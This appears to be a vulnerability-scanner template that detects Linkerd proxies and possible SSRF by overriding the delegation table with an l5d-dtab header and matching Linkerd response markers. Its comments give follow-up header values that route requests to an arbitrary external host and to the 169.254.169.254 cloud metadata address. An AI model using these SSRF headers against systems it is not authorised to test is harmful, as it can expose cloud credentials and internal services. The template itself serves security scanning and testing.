id: linkerd-ssrf-detect

# Detect the Linkerd service by overriding the delegation table and
# inspect the response for:
#   - a "Via: .. linkerd .."
#   - a "l5d-err" and/or a "l5d-success" header
#   - a verbose timeout error (binding timeout)
#   - a full response
# The full-response case indicates a possible SSRF condition, the others
# only indicates the service presence.
#
# If a full-response is returned you should really manually probe requests with
# the following header values:
#
#   - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts
#   - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata

info:
  name: Linkerd SSRF detection
  author: dudez
  severity: informative

requests:
  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      l5d-dtab: /svc/* => /$/inet/example.com/443

    matchers-condition: or
    matchers:
      - type: regex
        name: via-linkerd-present
        regex:
          - '(?mi)^Via\s*?:.*?linkerd.*$'
        part: header

      - type: regex
        name: l5d-err-present
        regex:
          - '(?mi)^l5d-err:.*$'
        part: header

      - type: regex
        name: l5d-success-class-present
        regex:
          - '(?mi)^l5d-success-class: 0.*$'
        part: header

      - type: word
        name: ssrf-response-body
        words:
          - '<p>This domain is for use in illustrative examples in documents.'
        part: body

      - type: regex
        name: resolve-timeout-error-present
        regex:
          - '(?mi)Exceeded .*? binding timeout while resolving name'
        part: body

      - type: regex
        name: dynbind-error-present
        regex:
          - '(?mi)exceeded .*? to unspecified while dyn binding'
        part: body